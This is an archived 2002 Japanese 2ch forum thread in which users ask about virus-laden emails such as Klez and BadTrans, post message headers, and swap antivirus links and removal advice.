5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

☆ウィルス情報&質問 総合スレッド☆part4

1 :シコき魔:02/06/14 22:32
ウィルスに関わる話題・質問はこちらに

IPAセキュリティセンターhttp://www.ipa.go.jp/security/isg/virus.html
Symantec Security Response http://www.symantec.com/region/jp/sarcj/
Trend Micro ウイルス情報 http://www.trendmicro.co.jp/virusinfo/index.asp
McAfee ウイルス情報 http://www.nai.com/japan/virusinfo/vinfo.asp
オンラインウイルス検索http://housecall.antivirus.com/housecall/start_jp.asp

[関連リンク]過去ログ・関連スレ等>>1-20あたり 補足>>1-50

・ウィルス用ソフトを入れて無い人は(知識や技術のある人を除いて)速やかに入れましょう
(無料AntiVirus【AntiVirPE/AVG/Antidote簡易版】http://pc.2ch.net/test/read.cgi/sec/1015584020/l50)

(win)[Ctrrl]+{F}キー (mac){コマンド}+{F}キーを押すとページ内検索が出来ます
このスレや過去スレの過去ログを検索してから質問してください




2 :2:02/06/14 22:32
過去スレ
このウイルス何? http://pc.2ch.net/test/read.cgi/sec/999636595/l50
☆ウィルス情報&質問 総合スレッド☆ http://pc.2ch.net/test/read.cgi/sec/1010948022/
☆ウィルス情報&質問 総合スレッド☆part2 http://pc.2ch.net/test/read.cgi/sec/1016863569/l50

Symantec Security Check
http://security2.norton.com/SSC/GetBrowser.asp?pkj=TICCYSHSFVIGMKIIPLB&scantype=2&plfid=20&langid=jp&venid=sym&from=/ssc/lunavbrk.asp
オンラインウイルス検索http://housecall.antivirus.com/housecall/start_jp.asp

検索窓にファイル名等を入力して利用。
基本中の基本だけど、ワクチンベンダーごとに、ウイルスの命名は違う。

Symantecウイルス辞典日本語版
http://www.symantec.com/region/jp/sarcj/vinfodb.html
Symantecウイルス辞典英語版(日本語版と微妙に内容が異なる事がある)
http://www.symantec.com/avcenter/vinfodb.html

TrendMicroウイルス情報
http://www.trendmicro.co.jp/vinfo/

McAFEEウイルス情報
http://vil.mcafee.com/default.asp?

[ウィルス対策ソフト]
【ノートン】インターネットセキュリティ2002 Ver.8 http://pc.2ch.net/test/read.cgi/sec/1019831285/l50
ウイルスバスター2002 Part3 http://pc.2ch.net/test/read.cgi/sec/1016076378/l50
がんばれマカフィー http://pc.2ch.net/test/read.cgi/sec/1020474494/l50
がんばれ!!ウイルス警備隊V3 http://pc.2ch.net/test/read.cgi/sec/1005442785/l50

[ウィルス対策ソフト(無料)]
無料AntiVirus【AntiVirPE/AVG/Antidote簡易版】http://pc.2ch.net/test/read.cgi/sec/1015584020/l50
H+BEDV Antivir Personal Edition Part2 http://pc.2ch.net/test/read.cgi/sec/1016561367/l50
【フリー】AVG Anti-Virus Version2 http://pc.2ch.net/test/read.cgi/sec/1018966825/l50
アンチドートを語ろう♪ http://pc.2ch.net/test/read.cgi/sec/1003987914/l50

最強のウィルス対策用ソフト http://pc.2ch.net/test/read.cgi/sec/1000957607/l50




3 :3:02/06/14 22:33
「森で遊ぼう」
(ファイヤーウォールソフト・無料ウィルス用ソフト等セキュリティ関係解説サイト
ダウンロードページのリンク 日本語解説ページあり)
http://eazyfox.tripod.co.jp/


・IE(インターネットエクスプローラ)やOE(アウトルックエクスプレス)は危ないと感じた人達へ
ネスケ(ネットスケープコミュニケータ)を使用するという手段があることも念頭にいれておいてください
http://home.netscape.com/ja/




4 :4:02/06/14 22:33
新種のウィルスが流行したときは専用スレのリンクよろしくお願いします

「Nimda !! 」【その4】 http://pc.2ch.net/test/read.cgi/sec/1001864573/l50
猛威をふるう BADTRANS.B Re: メール (4通目)http://pc.2ch.net/test/read.cgi/sec/1008355163/l50
HDぜんぶ消去した上ズタズタに!!ウィルス http://pc.2ch.net/test/read.cgi/sec/1001662997/l50
Flashムービーに感染するウィルスが登場! http://pc.2ch.net/test/read.cgi/sec/1010564675/l50
'code red'wormに続きw32/sircam http://pc.2ch.net/test/read.cgi/sec/995726416/l50
W32.Aliz.Wormって何? http://pc.2ch.net/test/read.cgi/sec/1006266327/l50
またIEにセキュリティホール! http://pc.2ch.net/test/read.cgi/sec/1008610094/l50
開いただけでウイルスに感染するページhttp://pc.2ch.net/test/read.cgi/sec/994847789/l50
WORM_GONE.A http://pc.2ch.net/test/read.cgi/sec/1007514716/l50
Mac用ウイルス対策ソフト http://pc.2ch.net/test/read.cgi/sec/1007675941/l50
virus下さい。http://pc.2ch.net/test/read.cgi/sec/996909531/l50
みんなでウイルスつくろうよ!!http://pc.2ch.net/test/read.cgi/sec/1008248305/l50 
[初心者必見]分かりやすいnimda対策ページhttp://pc.2ch.net/test/read.cgi/sec/1001407163/l50
ウィルスくれよ。サーカムとか。http://pc.2ch.net/test/read.cgi/sec/996425178/l50
コードレッドパート5 日本政府は反省汁http://pc.2ch.net/test/read.cgi/sec/997783469/l50
KDMEMPKD.EXEってなに? http://pc.2ch.net/test/read.cgi/sec/1011333304/l50
怪奇画像(怖い女)が一定感覚で現れる症状 http://pc.2ch.net/test/read.cgi/hack/1011083919/l50
気持ち悪い女の顔がhttp://pc.2ch.net/test/read.cgi/sec/1012037926/l50
今日最新のウイルスって・・・!!(Myparty) http://pc.2ch.net/test/read.cgi/sec/1012220835/l50
HDぜんぶ消去した上ズタズタに!!ウィルス 2台目http://pc.2ch.net/test/read.cgi/sec/1012296560/l50
破損、トロイ、ウィルス入り 4 http://tmp.2ch.net/test/read.cgi/download/1016806114/l50
【ネット】『C』で記述した初のウイルスが登場http://news.2ch.net/test/read.cgi/newsplus/1015048480/l50
ダイヤルQ2か国際電話に接続を切り替えるやつhttp://pc.2ch.net/test/read.cgi/isp/1010717649/
<IT>CからZドライブを全て上書きするFinal Fantasyワームhttp://news.2ch.net/test/read.cgi/newsplus/1015938003/l50

5 :5:02/06/14 22:34
【ウィルス警報】patch.exeに注意しる!http://pc.2ch.net/test/read.cgi/sec/1016082075/l50
<IT>ご注意!チェック済み装うウイルス「マイライフB」http://news.2ch.net/test/read.cgi/newsplus/1016802914/l50
ADSLユーザーにも 国際電話発信トラブルhttp://pc.2ch.net/test/read.cgi/sec/1016106504/l50
【勝手にDLし勝手に実行!ひとりエッチ上手なIE6】http://pc.2ch.net/test/read.cgi/sec/1016485189/l50
IE5・5と6・0、ネット閲覧ソフトに欠陥http://pc.2ch.net/test/read.cgi/sec/1005605775/l50
PE_Mtx.A, WORM_MTX.A に犯されました。http://pc.2ch.net/test/read.cgi/sec/1015939831/l50
開いただけでウイルスに感染するページhttp://pc.2ch.net/test/read.cgi/sec/994847789/l50
Klez系,Klez.Eスレッドhttp://pc.2ch.net/test/read.cgi/sec/1018248786/l50
インターネット悲しい目をした犬http://pc.2ch.net/test/read.cgi/sec/1018186700/l50
【勇気が無くてみれない画像スレッド】http://ex.2ch.net/test/read.cgi/entrance/1018680687/l50
♂MCAFEEのウィルススキャン どうよ♂http://pc.2ch.net/test/read.cgi/software/1001838214/l50
Klez系,Klez.Eスレッドhttp://pc.2ch.net/test/read.cgi/sec/1018248786/l50




6 :6:02/06/14 22:35
さあどうぞ。

7 :名無しさん@お腹いっぱい。:02/06/14 22:55
ほっしゅ!!ほっしゅ!!

8 :8:02/06/14 23:01
過去スレ

☆ウィルス情報&質問 総合スレッド☆part3
http://pc.2ch.net/test/read.cgi/sec/1020696417/l50

9 : :02/06/14 23:02
質問スレを1つ削る努力をしましょう

10 : :02/06/14 23:48


11 :名無しさん@お腹いっぱい。:02/06/15 01:49
Re hello ○○○ darling

○○○は自分のメルアドの頭の奴・・・・。
添付でいつも同じ時間帯に来るよ・・・。強制かかるよ。
これはただのエロ画像売り?それともだれかが自分のマシン狙ってるの?

12 :11:02/06/15 01:53
今日はRe;hello ○○○ darling
だったけど昨日は○○○が入ってるだけだったよ。
いつも違うのが来るよ。えーん。

13 :名無しさん@お腹いっぱい。:02/06/15 02:05
>>5
klez関連スレのリンクが旧スレになっております。
新スレはこちら
http://pc.2ch.net/test/read.cgi/sec/1021137509/

14 : :02/06/15 02:42
Received:from smtp.net-keeper.com (EHLO smtp.net-keeper.net) (210.157.11.225) by ** with SMTP
Received:from Pgmub (nttkngw08236.ppp.infoweb.ne.jp [211.133.15.236]) by smtp.net-keeper.net (8.11.2/Oh-2001-01-01) with SMTP id ** for < alex@azoogle.com >
Date**
Message-Id:< 211_133_15_236@smtp.net-keeper.net >
From:ddhkyoto< ddhkyoto@cb3.so-net.ne.jp >
To: clientrelations@hispeedmedia.com
Subject: Re:clientrelations,let's be friends
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary=U7rbSz24T559J

添付ファイル
file.html
picacu.scr・・・・・・・Klez
file.txt
AJI0

15 :馬鹿ヒーの佐藤さん:02/06/15 02:51
愛信株式情報のご利用ありがとうございます。

●今週の注目買銘柄 ●愛信株式情報バックナンバー ●愛信株式情報質問集
●実践株式情報(有料版) ●メルマガ実践株式情報(無料版) ●本日の安定係数最終結果
●東証株価情報 ●DJ INDU AVERAGE ●NASDAQ 株価情報
●安定係数日中足の1週間の推移
売買銘柄一覧(平成14年5月第1週)
低迷する市場に吹き始めた変革の風、加速する産業構造改革の企業統廃合
* 銘柄名をクリックすると、その銘柄の価格情報を表示します
+--------+------------------------+----+-------+-----------------------------+
| 会社名| 安値 高値 終値|UP率| 出来高| 406 413 420 427 安定係数|
+--------+------------------------+----+-------+-----------------------------+
|三井住友| 522 607 596| 5| 426298| -159 195 268 46 196|
| 三菱電|◎ 526 617 613| 6| 101844| -158 -8 40 61|


16 :名無しさん@お腹いっぱい。:02/06/16 06:28
JPEGウイルス登場、各社が警告
http://pc.2ch.net/test/read.cgi/sec/1024062979/l50

17 :名無しさん@お腹いっぱい。:02/06/16 09:06
ビジネスと経済 > 企業間取引 (BtoB) > マーケティング、広告 > スポーツ
パシフィック・クリエイティブ - モータースポーツ等のスポーツマーケティング、ラッピングバスの運行。

http://www.pacificcreative.co.jp/

のsasakiさんという人から、ガンガンとウィルスメールが送られてくるよ〜
こんなHPみたこともなかったのに!
なぜ私のメアド知ってんの?
変な会社なのかなあ〜?

18 : :02/06/16 20:49
 

19 :名無しさん@おひさまのよう。:02/06/16 22:58
>>14みたいな一覧ってどこで見るの?
うちポスペなんだけど、見る方法ってありますか?


20 :名無しさん@お腹いっぱい。:02/06/16 23:54
うちにはウイルスメルが累計3000件以上とどいてるYO
ピーク時には1日150件以上、いまでも1日5件くらい。
ま、セキュリテーガチガチだから感染しないけどね。
おかげで、見れないサイトも多々あり。

ルータPortルール、ノートンFW、ノートンPort遮断、
プロバ駆除、OE未使用。


21 : :02/06/17 00:12
>>19
ポスペじゃ無理

22 :名無しさん@お腹いっぱい。:02/06/17 00:15
883 名前:☆☆☆危険☆☆☆☆ 投稿日:02/06/17 00:01 ID:8YtNa4et
お前ら市ね。

tp://homepage3.nifty.com/girls_and_boys~/

★★★ウイルス★★★★



これってどんなウイルスなの?
教えてくださいまし。

23 : :02/06/17 00:21
>>22
ウイルスじゃない

24 :名無しさん@おひさまのよう。:02/06/17 00:26
>>21
無理ですか。むぅ。
最近たくさん来るから突き止めようと思ったんだけど
何かいい方法はありますか?

25 :名無しさん@お腹いっぱい。:02/06/17 00:26
>>24
受信メール.ppmを、メモ帳なんかで開く
すると、ずるずるって感じでみえるぜ

26 : :02/06/17 00:28
>>24
ポスペじゃ無理なんだからメーラー変えろってことぐらい解れよ


27 :ポスペはヘッダ見れないのか?:02/06/17 01:09
知らなかった。

28 :名無しさん@お腹いっぱい。:02/06/17 07:17
>>27
見えるっつうに(一通ごとじゃないけど)




29 :名無しさん@お腹いっぱい。:02/06/17 16:54
MS、誤ってウイルス入り開発ツールをリリース (Nimda)
http://www.zdnet.co.jp/news/0206/17/ne00_virus.html

30 :ななし:02/06/17 21:20
同じ人からウィルスがくるのですがもしかして同じ人からではなくその方も
被害者なのかもしれません。でもメアドがわかってるので一応連絡したほうがいいですか?

31 :名無しさん@お腹いっぱい。:02/06/17 22:04
>>30
そうしましょう。

32 :名無しさん@お腹いっぱい。:02/06/17 23:06
>>30
知人でしたらそうしましょう
他人だったら関わりあいになるのを控えましょう

33 :はま:02/06/18 00:00
この2,3日に知らない人がウイルス付のメールを送ってくるんですが、
どう対処したらいいのでしょうか?

34 :名無しさん@お腹いっぱい。:02/06/18 00:37
>>33
ただ捨てる。

35 :はま:02/06/18 01:02
しつこく送ってくるんですが。
それでもただ捨てるだけですか?

通報とかは効果なし?

36 :名無しさん@お腹いっぱい。:02/06/18 01:35
家にも来てます。見ず知らずの、メールのやり取りさえしたことないひとから。
htmlとpifの詰め合わせで。だれだ?こいつ。

37 :名無しさん@お腹いっぱい。:02/06/18 01:36
>>35
正しいメアドがわかるんなら教えてあげればいいさ。
誤爆は無駄だから。

38 :名無しさん@お腹いっぱい。:02/06/18 01:37
>>36
だから、友達の友達だろうさ。Klezだろ?

39 :aa:02/06/18 01:49
これはnanndesuka?
http://www.sol.dti.ne.jp/~taizen/yurei/die.htm




40 :名無しさん@お腹いっぱい。:02/06/18 02:00
なんでもありません

41 :はま:02/06/18 10:47
Hi,This is a special new website
I expect you would like it.
こんな文面で送ってくるんですが。
txtが添付されていてそれがウイルスなんです。
文面からすると嫌がらせじゃないかと。

でも、ウイルスが勝手に文章も作ってウイルスをばら撒くんですか?

嫌がらせじゃないんですか?
アドレスを見ると、JCOMのメルアドからですが。

42 :名無しさん@お腹いっぱい。:02/06/18 10:59
>でも、ウイルスが勝手に文章も作ってウイルスをばら撒くんですか?
そうだよ。いまどきのウィルスはみんなそう。勉強しろ。
嫌がらせの可能性は皆無ではないが、嫌がらせでウィルス送ると犯罪だからね。
普通はやらない。

43 :名無しさん@お腹いっぱい。:02/06/18 20:44
W杯関連のサイトを開いているのですが、
最近たまに「.jpg」「.bat」の2つのファイルが添付された
謎のメールが舞い込みます。
これってもしかしてウィルスなんでしょうか?
本文はHTMLらしいのですが表示されません。
(gooのフリーメールを使用していて、別窓表示してます)

1回だけ、「.jpg」のファイルを開いてみましたが
カメルーン選手の画像があったのみ。
そのあと、一応McAfeeのVirusScanをかけましたが
とくに何も検出されませんでした。

44 :43:02/06/18 20:47
ヘッダー例その1(添付ファイル「japanban[1].jpg (8KByte) 」「href.bat (85KByte) 」)
Return-Path: <kvnpi***@mail.ru>
Delivered-To: ***green@mail.goo.ne.jp
Received: (qmail 1359 invoked from network); 17 Jun 2002 21:01:33 +0900
Received: from unknown (HELO mx1.mail.ru) ([194.67.57.**]) (envelope-sender <kvnpi***@mail.ru>) by localhost.mail.goo.ne.jp (redundant-clusterd qmail-1.03) with SMTP for <***green@mail.goo.ne.jp>; 17 Jun 2002 21:01:33 +0900
Received: from [218.226.54.***] (helo=Ctlnrpow) by mx1.mail.ru with smtp (Exim SMTP.1) id 17JvCK-0005Tg-00 for ***green@mail.goo.ne.jp; Mon, 17 Jun 2002 16:01:28 +0400
From: webmaster <******@nikkei.co.jp>
To: ***green@mail.goo.ne.jp
Subject: Colspan
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary=K407258D8dt7l4jA0KmG651T
Message-Id: <E17JvCK-0005Tg-00@mx1.mail.ru>
Date: Mon, 17 Jun 2002 16:01:28 +0400


45 :43:02/06/18 20:48
ヘッダー例その2(添付ファイル「 [2].htm (38KByte) 」「韓国の.bat (85KByte) 」)
Return-Path: <***nohako@nifty.com>
Delivered-To: ***green@mail.goo.ne.jp
Received: (qmail 6184 invoked from network); 18 Jun 2002 14:30:20 +0900
Received: from unknown (HELO mail533.nifty.com) ([202.248.37.***]) (envelope-sender <***nohako@nifty.com>) by localhost.mail.goo.ne.jp (redundant-clusterd qmail-1.03) with SMTP for <***green@mail.goo.ne.jp>; 18 Jun 2002 14:30:20 +0900
Received: from Aewvu by mail533.nifty.com (8.12.3/3.7W-02/25/02) with SMTP id g5I5TdoJ008958 for <***green@mail.goo.ne.jp>; Tue, 18 Jun 2002 14:29:39 +0900
Date: Tue, 18 Jun 2002 14:29:39 +0900
Message-Id: <200206180529.g5I5TdoJ008958@mail533.nifty.com>
From: othergarden <***garden@hotmail.com>
To: ***green@mail.goo.ne.jp
Subject: Congratulations
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary=D31p4sconNePtusZB2A2821k17m4T0J85

46 :cheshire-cat:02/06/18 20:53
>>43
発言の意図が全く理解できません。
何をしたいんですか?

漏れは「意地悪」なヤシじゃないっすけど。

47 :43:02/06/18 21:00
>>46
いや、これってウイルスなのかな、って…
必ず「.jpg」と「.bat」のファイルがセットで添付された
メールが届くけど全然心当たりもないことだし…
ついでに、ヘッダ情報とかもよく判らないから
どっちのアドレスがこれの送信者なのか教えて頂ければと。

すみません、タブレットで窒息して逝ってきます(泣

48 :saki.he.net:02/06/18 21:04
<丶`Д´> アイゴー!! <丶`Д´> アイゴー!! <丶`Д´> アイゴー!!

49 :cheshire-cat:02/06/18 21:15
>>43
他のアンチウイルスソフトでスキャン、って手もあるかと。
MXで出回ってるHDフォーマット系のは、TrendMicorは対処早かったけど、Symantecはちょい遅くて、警備隊は未対応だったりするから。

例えば、Antidote簡易版。
http://www.vintage-solutions.com/Japanese/Antivirus/Super/

どっちのヘッダ説は、KLEZスレを読んで、過去スレの蓄積を自らの手で紐解いてください。
送信者の設定次第で、何でもありなんだから。
例えば。プロバのメルをメーラーに設定していないで、Yahoo!のメルのPOP設定だけしていると、妙なメルになります。

いずれにしても、batなんてウイルスメルじゃなければ、送信する事はさ、まずありえないファイル形式っす。


50 :名無しさん@お腹いっぱい。 :02/06/18 21:22
クラッシュミーとはどんなものですか?

51 :43:02/06/18 21:22
>>49
ありがとうございます。
でもなんでjpgファイルと必ずセットなんでしょう?
そればっかり10通ほど貰ってますが…

っていうか1枚だけjpgを開いちゃったんですけど、
bat開いてなければ大丈夫ですよね…?

52 :cheshire-cat:02/06/18 21:30
>>51の43
jpgは、SirCamの時と同じように、相手を油断させるために送るように設計されたような気がします。
最近爆笑したのは、KLEZ感染者から送られたメルに、出会い系サイトのプロフィールのキャッシュが送られてきた事でしょうか。
Batファイルをダブルクリックしなくても、MS01-020の穴が有効ならメルを開いただけで感染しますけど。
日頃からWindows Update(OEやそれに類似した動作をするメーラー)とOffice Update(Outlook ユーザー)をしてれば、問題ないです。

気になるなら、トレンドマイクロのオンラインスキャンやってください。
これはレトロウイルス(アンチウイルスソフトの起動・動作を阻害するウイルス)でも、機能停止しないサービスなんで(誤検出は多いけど)。
http://www.trendmicro.co.jp/hcall/index.asp

というか。ダイレクトアクション機能(メル開いただけで感染)は、MS01-020だけとは限らない(ような気がする)んで。
怪しいメルは、開かずに即捨ててしまうようにお勧めします。

53 :Found virus WORM_KLEZ.E in file under.pif:02/06/18 22:31
Received:from nu.vpo.fenics.or.jp (202.248.63.186) by ** with SMTP; **
Received:from Fqotre (localhost [127.0.0.1]) by nu.vpo.fenics.or.jp (8.9.3/3.7W) with SMTP id ** for < cpa@vertcoms.com >; **
Date**
Message-Id:< Fqotre_localhost_127_0_0_1_klezE_@nu.vpo.fenics.or.jp >
From: Fqotre_localhost_127_0_0_1_klezE_@nu.vpo.fenics.or.jp
To: remove@vertcoms.com
Subject: SOS!!!
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary=
-----------------
------------------ Virus Warning Message (on nu)

Found virus WORM_KLEZ.E in file under.pif
The file is deleted.

---------------------------------------------------------


54 :名無しさん@おひさまのよう。:02/06/18 23:32
>>25
亀レスですが、ありがとうございました。
ポスペでもちゃんと見れるんですね。

「Return-Path:」のアドレスの持主が感染者ってことで合ってますか?


55 :cheshire-cat:02/06/18 23:41
>>54
横レスですが。
「とあるReturn-path」の持ち主は、本当の感染者の可能性が高い、みたいな。

ポスペのロボットとかが持ち帰るアイテムに、ウイルスが入ってる事件は今時はどうなんでしょか。

56 :キタ━━━━━━(゚∀゚)━━━━━━ !!!!!:02/06/19 08:27
Return-Path: <saitoh@087j.com>
Received: from mail01.hs.kddi.ne.jp (mail01.hs.kddi.ne.jp [211.134.181.23])
by ******.**.jp (*.*.2+3.1W/3.7W) with ESMTP id SAA22321
for <****@******.**.jp>; Tue, 18 Jun 2002 18:09:29 +0900 (JST)
Received: from Ocm ([61.115.69.120]) by mail01.hs.kddi.ne.jp with SMTP
id <20020618090857.XPHL1566.mail01@Ocm> for <****@******.**.jp>;
Tue, 18 Jun 2002 18:08:57 +0900
From: voice <voice@nipponrentacar.co.jp>
To: ****@******.**.jp
Subject: Hi,****,meeting notice
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary=O54us1VEA31J599V38ge14P9385Jix1L95rH
Message-Id: <20020618090857.XPHL1566.mail01@Ocm>
Date: Tue, 18 Jun 2002 18:08:58 +0900
X-UIDL: 0ddc751bef31510a1313335b77bc65c6


57 :名無しさん@お腹いっぱい。:02/06/19 13:02
age

58 :名無しさん@お腹いっぱい。:02/06/19 14:25
http://members6.tsukaeru.net/sweet/swf/zion.html
これ、ウイルスでは?
ダウンロードに失敗した挙句、
PCがおかしくなったぞ!!
かちゅーしゃのログやkageを削除しようとしたぞ。
ドラッグ&ペースト等の通常の操作もままならず、
Alt+Ctrl+Delも受け付けない。
挙句の果てに、ピーと鳴ったままフリーズ状態。
ブラクラを踏んだときに似ていました。
仕方がないので、HDを壊す覚悟でコンセント抜き〜の。

詳しい方おられませんか?



59 : :02/06/19 14:44
>>58
ウイルスではないだろう

60 :Found virus WORM_KLEZ.E :02/06/19 19:53
Received:from nu.vpo.fenics.or.jp (202.248.63.186)
by ** with SMTP; 19 Jun 2002 10:41:39 +0900 (JST)
Received:from Lkyy (localhost [127.0.0.1]) by nu.vpo.fenics.or.jp (8.9.3/3.7W)
with SMTP id KAA22390 for < Printpal@equalamail.marketsvc.net >;
Wed, 19 Jun 2002 10:41:23 +0900 (JST)
Date: Wed, 19 Jun 2002 10:41:23 +0900 (JST)
Message-Id: < 200206190141.KAA22390_KlezE_@nu.vpo.fenics.or.jp >
From:taro< taro@bar.or.jp >
To: Printpal@equalamail.marketsvc.net
Subject: PROFITS, BUSINESS INTERRUPTION,
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary=OxYbRAYPBvR87ZdC

------------------ Virus Warning Message (on nu)

Found virus WORM_KLEZ.E in file of
The file is deleted.

---------------------------------------------------------

61 :名無しさん@お腹いっぱい。:02/06/19 21:15
>>60
お前ウザイ。

62 :はま:02/06/19 23:36
毎日知らない人から(複数)ウイルスが来るんですが。
いちいち捨てても毎日来るんですが、この状況を打破する方法はないんですか?

63 :名無しさん@お腹いっぱい。:02/06/19 23:39
>>62
キーボードを激しく叩いてください

64 :はま:02/06/20 00:02
そういっている間にも今また送られてきたんですが・・・
いずれもW32.Klez.H@mm
なんですが。。。

65 :名無しさん@お腹いっぱい。:02/06/20 00:06
>>64
http://pc.2ch.net/test/read.cgi/sec/1021895740/
ウィルスくらい笑い飛ばせる精神力を養うのが肝要かと。

66 :はま:02/06/20 00:11
>>65
そのスレッド見ましたが、未だダイヤルアップの私に、
通信時間がかさむだけの、ウイルスメールはウザイので笑えないんですが。

ちなみにエロサイトとか怪しいサイトでアドレス晒していないんですが。

67 :名無しさん@お腹いっぱい。:02/06/20 00:12
>>65
にしても91通は凄いよなぁ。




68 :名無しさん@お腹いっぱい。:02/06/20 00:28
>>66
この板のKLEZスレに発信者の探り方があるから、直接メルするか発信者のISPに連絡する。
ダウソしないで鯖上で削除するアプリを使う。(俺は知らないが多分存在するだろう)

69 :名無しさん@お腹いっぱい。:02/06/20 00:49
spam remover deleter filterで検索しれ
http://www.zdnet.co.jp/download/pc/internet/spambuster.html

>>68
telnetで出来る

70 :名無しさん@お腹いっぱい。:02/06/20 01:00
>>69
そりゃ出来るが>>66に説明するのは面倒だし。

71 :名無しさん@お腹いっぱい。:02/06/20 01:06
>>66
ここにありましたぜ。(自作ソフトだそうで)
Delete On Server
ttp://homepage1.nifty.com/sutak/

【このプログラムはメールサーバ上のメールを内容を読まずに一覧から選択し、
 簡単に削除することを目的としています。】 ということ。

72 :はま:02/06/20 01:12
>>68-71
ありがとうございます。
KLEZスレの発信者の探り方を参考にISPにメールを出してみました。

73 :名無しさん@お腹いっぱい。 :02/06/20 13:13
クラッシュミーってなに

74 :名無しさん@お腹いっぱい。:02/06/20 13:51
>>73 カワイソウニ…

75 :やまと:02/06/20 14:10
昨日19日にメールにウイルスが送られて来ました(怖い
ホットメールなのでDLは出来ないようになってるようですが
どのように対処すれば良いのでしょうか?
メールの表題部をJPG画像にしたので
どなたかアドバイスと、今後の予防法を
お教えいただけませんでしょうか
不安でたまりません、
よろしくお願いします

http://www22.big.or.jp/~storm7/cgi-bin3/img-box/img20020620140207.jpg

76 :やまと:02/06/20 14:53
はぅ・・・誰からも書き込みがない・・・・・・・・・

77 :名無しさん@お腹いっぱい。:02/06/20 15:02
>>75
削除する
以上

78 :名無しさん@お腹いっぱい。:02/06/20 15:04
>75
削除すりゃいいじゃん。
つかアンタ、自分のメアドは消してるけど、
差出人のメアドモロ出しやで。

79 :やまと:02/06/20 15:04
はい、わかりました
どうもありがとうございました

80 :やまと:02/06/20 15:07
相手はどこの誰かもわからず、悪意に満ちた人だと思われたので
あえて相手のメアドは晒しました、どこのなにものかまで判るのかと
思ったものですから、・・・・
ご迷惑をおかけしました
でも、返答があったのでなんか少し安心しました

81 :名無しさん@お腹いっぱい。:02/06/20 15:14
そのドメインは、プロバではないヨカン

82 :やまと:02/06/20 15:17
相手はかなりの熟練者なんでしょうか?
又狙われるかもしれませんね、なんか対策あるのでしょうか
このアドレスの受信拒否程度で防げますか?

83 :名無しさん@お腹いっぱい。:02/06/20 15:23
熟練者って何の?
http://www.trendmicro.co.jp/badtrans/
まあここでも見なされ。

84 :やまと:02/06/20 15:25
はい、早速見てみます、ありがとうございます

85 :名無しさん@お腹いっぱい。:02/06/20 15:26
>>82
つーか、ここで聞く前にBadTransがどんなものなのか調べたのか?
それがわかった上で晒してるのか?

86 :やまと:02/06/20 15:30
>>85
自動的に配信されたメールの可能性があるから
相手には悪意などないのでは? と言う意味でしょうか?

87 :名無しさん@お腹いっぱい。:02/06/20 15:32
>>86
悪意はないぜ、ふつうは。

88 :名無しさん@お腹いっぱい。:02/06/20 15:35
>86
もしかして、見ず知らずの相手から
悪意を持ってわざと送られてきたと思ってるのか((( ;゚Д゚)))ガクガクブルブル

89 :やまと:02/06/20 15:36
>>87
あ、そうなんですか・・・
メールの送信者も今回の私のように
知らない内に既に被害者になっていて
同時に加害者になっている、ということなんですね
それなら、送信者に対して行きすぎた晒し行為に
なるので、画像は急いで落としておきます
忠告ありがとうございます

90 :やまと:02/06/20 15:41
今、急いで画像の方は削除しました
本当にいろいろとありがとうございます
知らない事だらけで迷惑かけて申し訳ありません

91 :やまと:02/06/20 15:54
単純な疑問なんですが、過去 このアドレスで私にメールをくれた人は
二人しかいません、しかし最近事情があって、ある掲示板でアドレスを
晒してしまいました
そのアドレスを見た悪意のある第三者から送られて来たウイルスだと思
っていたのですが、それは違う、ということなのでしょうか?
知り合いの二人の内のどちらかがウイルスに感染していて、それが
自動的に私のところにも送られて来た、ということなのかな?
すみません、勉強不足で良くわかりません

92 :やまと:02/06/20 15:56
このアドレス→今回ウイルスが送られてきたアドレス

93 :名無しさん@お腹いっぱい。:02/06/20 15:57
>>91 >>83のリンク先よく嫁

94 :名無しさん@お腹いっぱい。:02/06/20 15:58
>>91
キミがそのアドレスで過去にメールを送った相手の可能性もある。
(相手の受信メールにアドレスが残る)

95 :名無しさん@お腹いっぱい。:02/06/20 16:00
>>91
見知らぬ人に送りつけるためにウィルスを保管するヤツはそういないと思う。

96 :やまと:02/06/20 16:03
>>94
あ!そういう事もあるんですか、良くわかりました
それなら可能性があります
しかし、しばらく使ってなかったアドを久しぶりに使ったら
このような事態になったので、どうしても解せなかったのですが
やはり偶然なんでしょうね、ほんとコワイです

97 :やまと:02/06/20 16:04
>>95
たしかにそうですよね、私の疑心暗鬼というか
無知のなせるワザでした、ごめんなさい

98 :名無しさん@お腹いっぱい。:02/06/20 16:28
>>73 ブラクラ

99 :名無しさん@お腹いっぱい。:02/06/20 16:38
>>97
自分の知識のなさで他人のアドレスを晒したわけか。
最悪だね。

100 :名無しさん@お腹いっぱい。:02/06/20 18:50
バスター2002は「klez」に対応していますか?
ポストペット使ってこの間「klez」4通程もらいました。
その後ウイルスと気づきklezを削除しました。
不安になりバスター2002を購入して調べましたが
「感染ファイルは見つかりませんでした」
としか出てこないのですが。逆に不安です。
現在は、プロバイダに有償でウイルスチェック
してもらうようにしています。
加入後も何通か来ましたがプロバイダが
削除してくれました。

101 :名無しさん@お腹いっぱい。:02/06/20 18:54
>>100
定義ファイルの更新はちゃんとやってるの?
購入後即だと、製造時のままの状態なわけで。

102 :名無しさん@お腹いっぱい。:02/06/20 19:01
製造時のままです。
そういえば、mailで有償のヴァージョンアップの
お知らせみたいのは来てますね。


103 :名無しさん@お腹いっぱい。:02/06/20 19:03
↑101さんにです。


104 :cheshire-cat:02/06/20 19:20
>>100
対応していますが。
けどレトロウイルス系の動作をするので、感染後にアンチウイルスソフトの挙動を妨害する可能性があります。
ですんで、感染後にインストールしても、「アンチウイルスソフトがまともに稼動するか?」、これは微妙なものかと思いまする。

こちらでどんぞ。
TrendMicroのオンラインスキャンは誤検出問題で叩かれたけど、とりあえずそういう問題には関わり無いサービスですんで。
http://www.trendmicro.co.jp/hcall/index.asp


105 :cheshire-cat:02/06/20 19:21
追伸
KLEZ駆除ツールの方が早道っすね。
すんません、こっちを試してください。
http://www.symantec.com/region/jp/sarcj/data/w/w32.klez.removal.tool.html

106 :名無しさん@お腹いっぱい。:02/06/20 19:21
>>100,>>102
ウイルスバスタースレとマルチポストした?


107 :Found virus WORM_KLEZ.E :02/06/20 19:24
Received:from imlmta02.aics.ne.jp (157.205.253.194)
